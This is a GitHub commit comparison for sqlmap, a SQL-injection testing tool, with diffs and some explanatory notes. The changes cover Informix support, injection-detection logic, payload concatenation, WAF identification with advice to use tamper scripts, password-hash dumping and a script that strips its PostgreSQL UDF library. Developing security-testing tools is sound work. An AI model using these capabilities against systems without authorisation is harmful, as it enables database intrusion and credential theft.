Compare commits

..

65 Commits

Author SHA1 Message Date
Miroslav Stampar
54ca69fa90 Proper form for excluded case in escaper 2016-10-01 21:15:35 +02:00
Miroslav Stampar
d8dd37510c Fixes #2202 2016-10-01 21:02:40 +02:00
Miroslav Stampar
d1680b04f3 Minor code consistency update 2016-09-29 21:26:47 +02:00
Miroslav Stampar
102d4b4119 Bug fix for uploading files in case of web subdirectories 2016-09-29 21:14:28 +02:00
Miroslav Stampar
b3b49b3492 Minor patch for --parse-errors 2016-09-29 18:07:00 +02:00
Miroslav Stampar
7a89433251 Minor patch 2016-09-29 18:02:20 +02:00
Miroslav Stampar
ced6711128 Playing a bit with logo 2016-09-29 15:59:28 +02:00
Miroslav Stampar
bdf76f8d4d Revisiting user-agents (newer versions of mainstream browsers) 2016-09-29 15:21:32 +02:00
Miroslav Stampar
571ae174bd Minor language update 2016-09-29 14:55:43 +02:00
Miroslav Stampar
332726356c Minor language update 2016-09-29 14:03:46 +02:00
Miroslav Stampar
4ea9d3b884 Replacing generic concatenation || with CONCAT (far better choice) 2016-09-29 13:35:16 +02:00
Miroslav Stampar
3409953538 Revisiting default level 1 payloads (MySQL stacked queries are as frequent as double rainbows) 2016-09-29 12:59:51 +02:00
Miroslav Stampar
3b3ab072e6 Adding short option(s) for setting verbosity (e.g. -vvv) 2016-09-29 11:19:25 +02:00
Miroslav Stampar
fef407e09c Making HTTP requests up to 20% smaller (fine tuning the request headers) 2016-09-29 10:44:00 +02:00
Miroslav Stampar
5afccce3c6 Minor patch 2016-09-28 16:56:47 +02:00
Miroslav Stampar
e439095593 Bug fix for MySQL's --os-pwn 2016-09-28 15:39:34 +02:00
Miroslav Stampar
e77126e847 Removing obsolete functionality 2016-09-28 15:00:26 +02:00
Miroslav Stampar
3ef01f0e31 Minor update 2016-09-28 14:48:33 +02:00
Miroslav Stampar
d36b5c0a4b Adding time-based blind (heavy query) payloads for Informix (Issue #552) 2016-09-28 10:30:09 +02:00
Miroslav Stampar
e5a758bdf4 Fixes #2192 2016-09-28 09:55:14 +02:00
Miroslav Stampar
617509869d Minor patch for Informix --parse-errors 2016-09-27 14:58:10 +02:00
Miroslav Stampar
5079c42788 Adding Informix parameter replacement payloads (Issue #552) 2016-09-27 14:39:17 +02:00
Miroslav Stampar
bc7ab01066 Bug fix for generic parameter replacement (CASE) 2016-09-27 14:29:18 +02:00
Miroslav Stampar
212c1ec1f2 Couple of fixes and some testing stuff 2016-09-27 14:03:59 +02:00
Miroslav Stampar
381deb68ff Implementation for an Issue #2137 2016-09-27 13:26:11 +02:00
Miroslav Stampar
ba0facb5eb Removal of unused imports 2016-09-27 11:23:31 +02:00
Miroslav Stampar
7151df16f6 Adding extra validation step in case of boolean-based blind (e.g. if unexpected 500 occurs) 2016-09-27 11:21:12 +02:00
Miroslav Stampar
8994bf2dba Further dealing with time-based SQLi (Issue #1973) 2016-09-27 10:32:22 +02:00
Miroslav Stampar
09617c8243 Introducing extra validation property in case of time-based SQLi (HTTP code) - Issue #1973 2016-09-27 10:20:36 +02:00
Miroslav Stampar
556b4d289e Minor cosmetic patch (removing multiple same content '...appears...' messages) 2016-09-26 17:02:40 +02:00
Miroslav Stampar
978f56ad10 One more commit for #552 (--passwords) 2016-09-26 16:38:03 +02:00
Miroslav Stampar
aa0b97b562 Support for Informix --roles/--privileges (Issue #552) 2016-09-26 14:20:04 +02:00
Miroslav Stampar
df645d7d3d Update for column types (Issue #552) 2016-09-23 18:03:31 +02:00
Miroslav Stampar
035137ef4e Bug fix in detection engine (abstract URI header sometimes caused problems - e.g. when automatic --string used) 2016-09-23 17:38:14 +02:00
Miroslav Stampar
484d9a4825 Implementation of --dump for Informix (Issue #552) 2016-09-23 17:21:48 +02:00
Miroslav Stampar
65c305cff0 Fixes #2174 2016-09-23 15:41:12 +02:00
Miroslav Stampar
9a5fc5ccf4 New auxiliary (extra) file (for administration purposes) 2016-09-23 13:57:18 +02:00
Miroslav Stampar
51a1973224 Stripping PostgreSQL .so files for size issues (Issue #2173) 2016-09-23 13:52:57 +02:00
Miroslav Stampar
2f2a63334a Minor cleanup 2016-09-23 13:39:27 +02:00
Miroslav Stampar
23afeb4c7a Fixes #2176 2016-09-23 13:37:44 +02:00
Miroslav Stampar
b387fb219d Fixes #2175 2016-09-23 12:45:06 +02:00
Miroslav Stampar
1b48ff223d Adding initial support for Informix (Issue #552) 2016-09-23 12:33:27 +02:00
Miroslav Stampar
640e605412 More CTF friendly (common column and table name flag :) 2016-09-23 12:31:28 +02:00
Miroslav Stampar
e10bb42597 Minor tweak 2016-09-22 10:22:48 +02:00
Miroslav Stampar
9902018cab Implementation for an Issue #2172 2016-09-21 15:45:55 +02:00
Miroslav Stampar
56a918c408 Minor refactoring 2016-09-20 10:03:00 +02:00
Miroslav Stampar
bcd62ecc5b Minor optimization (avoiding unnecessary deepcopies) 2016-09-20 09:56:08 +02:00
Miroslav Stampar
e519484230 Patching live-testing 2016-09-19 15:51:28 +02:00
Miroslav Stampar
a2c8f1deb1 Update PgSQL fingerprinting payloads 2016-09-19 14:23:51 +02:00
Miroslav Stampar
12dc53f687 Minor update 2016-09-19 13:54:06 +02:00
Miroslav Stampar
b3b5bd267d Adding new tamper script (on request from @MilanGabor) 2016-09-15 17:59:01 +02:00
Miroslav Stampar
edcfffc279 Merge pull request #2170 from ClementNotin/ClementNotin-patch-netscaler.py
Fix "or-assign" for return value in netscaler.py
2016-09-15 17:29:31 +02:00
Clément Notin
3bbfd0665c Fix "or-assign" for return value in netscaler.py 2016-09-15 16:56:49 +02:00
Miroslav Stampar
921a53e314 Patch for counter in --smoke-test 2016-09-09 14:59:22 +02:00
Miroslav Stampar
32dd4a938c Minor patch of message 2016-09-09 11:37:16 +02:00
Miroslav Stampar
9930f1b55b Speed optimization(s) 2016-09-09 11:06:38 +02:00
Miroslav Stampar
8581d9e2ca Minor improvement of SELECT_FROM_TABLE_REGEX 2016-09-09 09:45:48 +02:00
Miroslav Stampar
1a613ed9a8 Minor update 2016-09-08 14:08:14 +02:00
Miroslav Stampar
78e398d9c4 Fixes #2136 2016-09-06 15:03:17 +02:00
Miroslav Stampar
e3c3c2c185 Fixes #2148 2016-09-06 14:25:29 +02:00
Miroslav Stampar
4e36bbaff9 Update related to the last commit 2016-09-04 03:09:28 +02:00
Miroslav Stampar
603e9739ae Fixes #2146 2016-09-04 01:33:52 +02:00
Miroslav Stampar
6b91b7b7fa Minor cosmetics 2016-09-02 16:10:11 +02:00
Miroslav Stampar
2e62fda57d Minor update 2016-09-02 15:55:33 +02:00
Miroslav Stampar
5ad27264a2 Patches #2143 2016-09-02 15:52:07 +02:00
69 changed files with 5245 additions and 3131 deletions

View File

@@ -23,7 +23,7 @@ HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})"
 SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c"
 # Characters that don't need to be safe encoded
-SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
+SAFE_CHARS = "".join(filter(lambda _: _ not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
 # Prefix used for hex encoded values
 HEX_ENCODED_PREFIX = r"\x"
@@ -47,7 +47,7 @@ def safecharencode(value):
     retVal = value

     if isinstance(value, basestring):
-        if any(_ not in SAFE_CHARS for _ in value):
+        if any([_ not in SAFE_CHARS for _ in value]):
             retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER)
             retVal = retVal.replace('\\', SLASH_MARKER)
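Note: the any(...) change above swaps a generator expression for a list comprehension. On the Python 2 interpreter that sqlmap targets, feeding any() a list is often marginally faster for short inputs because it avoids per-item generator resumption, at the cost of losing short-circuiting. A rough, illustrative micro-benchmark (not part of the repository; numbers vary by interpreter and input):

# Illustrative micro-benchmark: generator expression vs. list comprehension in any()
import timeit

setup = "SAFE_CHARS = set('abcdef'); value = 'abcdef' * 10"
print(timeit.timeit("any(_ not in SAFE_CHARS for _ in value)", setup=setup, number=100000))
print(timeit.timeit("any([_ not in SAFE_CHARS for _ in value])", setup=setup, number=100000))
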

extra/shutils/strip.sh (new file, 15 lines)
View File

@@ -0,0 +1,15 @@
#!/bin/bash
# References: http://www.thegeekstuff.com/2012/09/strip-command-examples/
# http://www.muppetlabs.com/~breadbox/software/elfkickers.html
# https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html
# For example:
# python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_
# ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so
# python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so
# rm lib_postgresqludf_sys.so
strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $*
sstrip $*

View File

@@ -74,8 +74,7 @@ def action():
     if conf.getPasswordHashes:
         try:
-            conf.dumper.userSettings("database management system users password hashes",
-                                     conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
+            conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
         except SqlmapNoneDataException, ex:
             logger.critical(ex)
         except:
@@ -83,8 +82,7 @@ def action():
     if conf.getPrivileges:
         try:
-            conf.dumper.userSettings("database management system users privileges",
-                                     conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
+            conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
         except SqlmapNoneDataException, ex:
             logger.critical(ex)
         except:
@@ -92,8 +90,7 @@ def action():
     if conf.getRoles:
         try:
-            conf.dumper.userSettings("database management system users roles",
-                                     conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
+            conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
         except SqlmapNoneDataException, ex:
             logger.critical(ex)
         except:

View File

@@ -74,6 +74,7 @@ from lib.core.settings import IDS_WAF_CHECK_RATIO
 from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
 from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
 from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
+from lib.core.settings import SLEEP_TIME_MARKER
 from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
 from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import URI_HTTP_HEADER
@@ -94,6 +95,13 @@ def checkSqlInjection(place, parameter, value):
     # Localized thread data needed for some methods
     threadData = getCurrentThreadData()

+    # Favoring non-string specific boundaries in case of digit-like parameter values
+    if value.isdigit():
+        kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
+        boundaries = kb.cache.intBoundaries
+    else:
+        boundaries = conf.boundaries
+
     # Set the flag for SQL injection test mode
     kb.testMode = True
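Note: the block added above reorders the configured boundaries once per run so that, for digit-like parameter values, boundaries whose prefix/suffix contain quote characters are tried last (sorted() is stable, and a False key sorts before True). A standalone sketch of the same ordering idea, using hypothetical Boundary tuples rather than sqlmap's internal objects:

# Standalone sketch of the boundary-ordering idea (hypothetical Boundary class,
# not the sqlmap implementation itself).
from collections import namedtuple

Boundary = namedtuple("Boundary", ("prefix", "suffix"))

boundaries = [Boundary("'", "'"), Boundary("", ""), Boundary('"', '"'), Boundary(")", "--")]

# Quote-free boundaries first: the sort key is False (0) for them, True (1) otherwise
ordered = sorted(boundaries, key=lambda b: any(c in (b.prefix or "") or c in (b.suffix or "") for c in ('"', "'")))

print(ordered)  # quote-less boundaries come first, quoted ones last
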
@@ -149,6 +157,7 @@ def checkSqlInjection(place, parameter, value):
         kb.testType = stype = test.stype
         clause = test.clause
         unionExtended = False
+        trueCode, falseCode = None, None

         if stype == PAYLOAD.TECHNIQUE.UNION:
             configUnion(test.request.char)
@@ -311,12 +320,6 @@ def checkSqlInjection(place, parameter, value):
            comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
            fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)

-            # Favoring non-string specific boundaries in case of digit-like parameter values
-            if value.isdigit():
-                boundaries = sorted(copy.deepcopy(conf.boundaries), key=lambda x: any(_ in (x.prefix or "") or _ in (x.suffix or "") for _ in ('"', '\'')))
-            else:
-                boundaries = conf.boundaries
-
            for boundary in boundaries:
                injectable = False
@@ -519,7 +522,7 @@ def checkSqlInjection(place, parameter, value):
                        if not any((conf.string, conf.notString, conf.code)):
                            infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title)
-                            logger.info(infoMsg)
+                            singleTimeLogMessage(infoMsg)

                    # In case of error-based SQL injection
                    elif method == PAYLOAD.METHOD.GREP:
@@ -555,8 +558,15 @@ def checkSqlInjection(place, parameter, value):
                    elif method == PAYLOAD.METHOD.TIME:
                        # Perform the test's request
                        trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
+                        trueCode = threadData.lastCode

                        if trueResult:
+                            # Extra validation step (e.g. to check for DROP protection mechanisms)
+                            if SLEEP_TIME_MARKER in reqPayload:
+                                falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, "0"), place, timeBasedCompare=True, raise404=False)
+                                if falseResult:
+                                    continue
+
                            # Confirm test's results
                            trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
@@ -667,6 +677,8 @@ def checkSqlInjection(place, parameter, value):
                injection.data[stype].comment = comment
                injection.data[stype].templatePayload = templatePayload
                injection.data[stype].matchRatio = kb.matchRatio
+                injection.data[stype].trueCode = trueCode
+                injection.data[stype].falseCode = falseCode

                injection.conf.textOnly = conf.textOnly
                injection.conf.titles = conf.titles
@@ -1317,7 +1329,7 @@ def identifyWaf():
            kb.redirectChoice = popValue()
        return page or "", headers or {}, code

-    retVal = False
+    retVal = []

    for function, product in kb.wafFunctions:
        try:
@@ -1331,18 +1343,20 @@ def identifyWaf():
            found = False

        if found:
-            retVal = product
-            break
-
-    if retVal:
-        errMsg = "WAF/IDS/IPS identified as '%s'. Please " % retVal
-        errMsg += "consider usage of tamper scripts (option '--tamper')"
-        logger.critical(errMsg)
+            errMsg = "WAF/IDS/IPS identified as '%s'" % product
+            logger.critical(errMsg)
+
+            retVal.append(product)

+    if retVal:
        message = "are you sure that you want to "
        message += "continue with further target testing? [y/N] "
        output = readInput(message, default="N")

+        if not conf.tamper:
+            warnMsg = "please consider usage of tamper scripts (option '--tamper')"
+            singleTimeWarnMessage(warnMsg)
+
        if output and output[0] not in ("Y", "y"):
            raise SqlmapUserQuitException
        else:
@@ -1374,7 +1388,7 @@ def checkNullConnection():
        if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
            kb.nullConnection = NULLCONNECTION.HEAD

-            infoMsg = "NULL connection is supported with HEAD header"
+            infoMsg = "NULL connection is supported with HEAD method (Content-Length)"
            logger.info(infoMsg)
        else:
            page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"})
@@ -1382,7 +1396,7 @@ def checkNullConnection():
            if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):
                kb.nullConnection = NULLCONNECTION.RANGE

-                infoMsg = "NULL connection is supported with GET header "
+                infoMsg = "NULL connection is supported with GET method (Range)"
                infoMsg += "'%s'" % kb.nullConnection
                logger.info(infoMsg)
            else:

View File

@@ -545,7 +545,7 @@ def start():
                    kb.testedParams.add(paramKey)

                    if not injectable:
-                        warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
+                        warnMsg = "%s parameter '%s' does not seem to be " % (paramType, parameter)
                        warnMsg += "injectable"
                        logger.warn(warnMsg)

View File

@@ -22,6 +22,7 @@ from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import DB2_ALIASES
 from lib.core.settings import HSQLDB_ALIASES
+from lib.core.settings import INFORMIX_ALIASES
 from lib.utils.sqlalchemy import SQLAlchemy

 from plugins.dbms.mssqlserver import MSSQLServerMap
@@ -46,6 +47,8 @@ from plugins.dbms.db2 import DB2Map
 from plugins.dbms.db2.connector import Connector as DB2Conn
 from plugins.dbms.hsqldb import HSQLDBMap
 from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
+from plugins.dbms.informix import InformixMap
+from plugins.dbms.informix.connector import Connector as InformixConn

 def setHandler():
     """
@@ -65,6 +68,7 @@ def setHandler():
         (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
         (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
         (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
+        (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
     ]

     _ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)

View File

@@ -43,6 +43,7 @@ from lib.core.settings import GENERIC_SQL_COMMENT
 from lib.core.settings import NULL
 from lib.core.settings import PAYLOAD_DELIMITER
 from lib.core.settings import REPLACEMENT_MARKER
+from lib.core.settings import SLEEP_TIME_MARKER
 from lib.core.unescaper import unescaper

 class Agent(object):
@@ -343,7 +344,7 @@ class Agent(object):
         """

         if payload:
-            payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
+            payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec))

         return payload
@@ -486,7 +487,7 @@ class Agent(object):
         @rtype: C{str}
         """

-        prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT \d+)\s+\d+)*"
+        prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT(?: \d+)?)\s+\d+)*"
         fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
         fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I)
         fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I)
@@ -507,26 +508,26 @@ class Agent(object):
         if fieldsSubstr:
             fieldsToCastStr = query
         elif fieldsMinMaxstr:
-            fieldsToCastStr = fieldsMinMaxstr.groups()[0]
+            fieldsToCastStr = fieldsMinMaxstr.group(1)
         elif fieldsExists:
             if fieldsSelect:
-                fieldsToCastStr = fieldsSelect.groups()[0]
+                fieldsToCastStr = fieldsSelect.group(1)
         elif fieldsSelectTop:
-            fieldsToCastStr = fieldsSelectTop.groups()[0]
+            fieldsToCastStr = fieldsSelectTop.group(1)
         elif fieldsSelectRownum:
-            fieldsToCastStr = fieldsSelectRownum.groups()[0]
+            fieldsToCastStr = fieldsSelectRownum.group(1)
         elif fieldsSelectDistinct:
             if Backend.getDbms() in (DBMS.HSQLDB,):
                 fieldsToCastStr = fieldsNoSelect
             else:
-                fieldsToCastStr = fieldsSelectDistinct.groups()[0]
+                fieldsToCastStr = fieldsSelectDistinct.group(1)
         elif fieldsSelectCase:
-            fieldsToCastStr = fieldsSelectCase.groups()[0]
+            fieldsToCastStr = fieldsSelectCase.group(1)
         elif fieldsSelectFrom:
             fieldsToCastStr = query[:unArrayizeValue(_)] if _ else query
             fieldsToCastStr = re.sub(r"\ASELECT%s\s+" % prefixRegex, "", fieldsToCastStr)
         elif fieldsSelect:
-            fieldsToCastStr = fieldsSelect.groups()[0]
+            fieldsToCastStr = fieldsSelect.group(1)

         # Function
         if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
@@ -667,24 +668,23 @@ class Agent(object):
             concatenatedQuery = "'%s'&%s&'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
         else:
-            warnMsg = "applying generic concatenation with double pipes ('||')"
+            warnMsg = "applying generic concatenation (CONCAT)"
             singleTimeWarnMessage(warnMsg)

             if fieldsExists:
-                concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
-                concatenatedQuery += "||'%s'" % kb.chars.stop
+                concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
+                concatenatedQuery += "),'%s')" % kb.chars.stop
             elif fieldsSelectCase:
-                concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||(SELECT " % kb.chars.start, 1)
-                concatenatedQuery += ")||'%s'" % kb.chars.stop
+                concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
+                concatenatedQuery += "),'%s')" % kb.chars.stop
             elif fieldsSelectFrom:
-                concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
                 _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
-                concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
+                concatenatedQuery = "%s),'%s')%s" % (concatenatedQuery[:_].replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1), kb.chars.stop, concatenatedQuery[_:])
             elif fieldsSelect:
-                concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
-                concatenatedQuery += "||'%s'" % kb.chars.stop
+                concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
+                concatenatedQuery += "),'%s')" % kb.chars.stop
             elif fieldsNoSelect:
-                concatenatedQuery = "'%s'||%s||'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
+                concatenatedQuery = "CONCAT(CONCAT('%s',%s),'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)

         return concatenatedQuery
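Note: the rewritten branches above build the marked expression with the two-argument CONCAT() form, nesting two calls to join the start marker, the original expression and the stop marker. On MySQL, for instance, '||' acts as a logical OR by default while CONCAT() always concatenates, which is presumably why it is the safer generic choice. A rough sketch of the resulting string building (placeholder markers; sqlmap generates random ones):

# Rough sketch of how the generic CONCAT wrapping produces a marked expression.
# The marker values are placeholders; sqlmap uses randomly generated ones.
start, stop = "MARK_START", "MARK_STOP"

def wrap(expression):
    # CONCAT(CONCAT('start', <expression>), 'stop')
    return "CONCAT(CONCAT('%s',%s),'%s')" % (start, expression, stop)

print(wrap("banner"))                 # CONCAT(CONCAT('MARK_START',banner),'MARK_STOP')
print(wrap("(SELECT user FROM t)"))   # the wrapped subquery keeps its own parentheses
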

View File

@@ -813,11 +813,6 @@ def getAutoDirectories():
         warnMsg = "unable to automatically parse any web server path"
         logger.warn(warnMsg)

-    _ = extractRegexResult(r"//[^/]+?(?P<result>/.*)/", conf.url)  # web directory
-
-    if _:
-        retVal.add(_)
-
     return list(retVal)

 def filePathToSafeString(filePath):
@@ -1200,6 +1195,7 @@ def setPaths(rootPath):
     paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")

     _ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap")
+    paths.SQLMAP_HOME_PATH = _
     paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
     paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
     paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
@@ -2227,10 +2223,6 @@ def getUnicode(value, encoding=None, noneToNull=False):
     if noneToNull and value is None:
         return NULL

-    if isListLike(value):
-        value = list(getUnicode(_, encoding, noneToNull) for _ in value)
-        return value
-
     if isinstance(value, unicode):
         return value
     elif isinstance(value, basestring):
@@ -2242,6 +2234,9 @@ def getUnicode(value, encoding=None, noneToNull=False):
                     return unicode(value, UNICODE_ENCODING)
                 except:
                     value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
+    elif isListLike(value):
+        value = list(getUnicode(_, encoding, noneToNull) for _ in value)
+        return value
     else:
         try:
             return unicode(value)
@@ -2559,6 +2554,7 @@ def logHTTPTraffic(requestLogMsg, responseLogMsg):
 def getPageTemplate(payload, place):  # Cross-linked function
     raise NotImplementedError

+@cachedmethod
 def getPublicTypeMembers(type_, onlyValues=False):
     """
     Useful for getting members from types (e.g. in enums)
@@ -2567,12 +2563,16 @@ def getPublicTypeMembers(type_, onlyValues=False):
     ['Linux', 'Windows']
     """

+    retVal = []
+
     for name, value in inspect.getmembers(type_):
         if not name.startswith('__'):
             if not onlyValues:
-                yield (name, value)
+                retVal.append((name, value))
             else:
-                yield value
+                retVal.append(value)
+
+    return retVal

 def enumValueToNameLookup(type_, value_):
     """
@@ -3581,6 +3581,7 @@ def randomizeParameterValue(value):

     return retVal

+@cachedmethod
 def asciifyUrl(url, forceQuote=False):
     """
     Attempts to make a unicode URL usuable with ``urllib/urllib2``.
@@ -4075,8 +4076,11 @@ def getRequestHeader(request, name):
     """

     retVal = None
+
     if request and name:
-        retVal = max(value if name.upper() == key.upper() else None for key, value in request.header_items())
+        _ = name.upper()
+        retVal = max([value if _ == key.upper() else None for key, value in request.header_items()])
+
     return retVal

 def isNumber(value):

View File

@@ -21,6 +21,7 @@ from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import DB2_ALIASES
 from lib.core.settings import HSQLDB_ALIASES
+from lib.core.settings import INFORMIX_ALIASES

 FIREBIRD_TYPES = {
     261: "BLOB",
@@ -39,6 +40,41 @@ FIREBIRD_TYPES = {
     37: "VARCHAR",
 }

+INFORMIX_TYPES = {
+    0: "CHAR",
+    1: "SMALLINT",
+    2: "INTEGER",
+    3: "FLOAT",
+    4: "SMALLFLOAT",
+    5: "DECIMAL",
+    6: "SERIAL",
+    7: "DATE",
+    8: "MONEY",
+    9: "NULL",
+    10: "DATETIME",
+    11: "BYTE",
+    12: "TEXT",
+    13: "VARCHAR",
+    14: "INTERVAL",
+    15: "NCHAR",
+    16: "NVARCHAR",
+    17: "INT8",
+    18: "SERIAL8",
+    19: "SET",
+    20: "MULTISET",
+    21: "LIST",
+    22: "ROW (unnamed)",
+    23: "COLLECTION",
+    40: "Variable-length opaque type",
+    41: "Fixed-length opaque type",
+    43: "LVARCHAR",
+    45: "BOOLEAN",
+    52: "BIGINT",
+    53: "BIGSERIAL",
+    2061: "IDSSECURITYLABEL",
+    4118: "ROW (named)",
+}
+
 SYBASE_TYPES = {
     14: "floatn",
     8: "float",
@@ -123,6 +159,17 @@ FIREBIRD_PRIVS = {
     "B": "SUBSCRIBE",
 }

+# Reference(s): https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sqls.doc/ids_sqs_0147.htm
+#               https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_077.htm
+
+INFORMIX_PRIVS = {
+    "D": "DBA (all privileges)",
+    "R": "RESOURCE (create UDRs, UDTs, permanent tables and indexes)",
+    "C": "CONNECT (work with existing tables)",
+    "G": "ROLE",
+    "U": "DEFAULT (implicit connection)",
+}
+
 DB2_PRIVS = {
     1: "CONTROLAUTH",
     2: "ALTERAUTH",
@@ -146,8 +193,9 @@ DBMS_DICT = {
     DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
     DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
     DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
-    DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
+    DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
     DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
+    DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
 }

 FROM_DUMMY_TABLE = {
@@ -156,7 +204,8 @@ FROM_DUMMY_TABLE = {
     DBMS.FIREBIRD: " FROM RDB$DATABASE",
     DBMS.MAXDB: " FROM VERSIONS",
     DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
-    DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS"
+    DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS",
+    DBMS.INFORMIX: " FROM SYSMASTER:SYSDUAL"
 }

 SQL_STATEMENTS = {
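Note: FROM_DUMMY_TABLE supplies the mandatory FROM clause for back-ends that cannot evaluate a bare SELECT of an expression; the new Informix entry points at the sysmaster:sysdual dummy table. A rough sketch of how such a suffix would be appended (illustrative helper, not the actual sqlmap call site):

# Sketch: appending the per-DBMS dummy-table suffix to an expression-only SELECT.
FROM_DUMMY_TABLE = {
    "Oracle": " FROM DUAL",
    "DB2": " FROM SYSIBM.SYSDUMMY1",
    "Informix": " FROM SYSMASTER:SYSDUAL",
}

def forge_query(expression, dbms):
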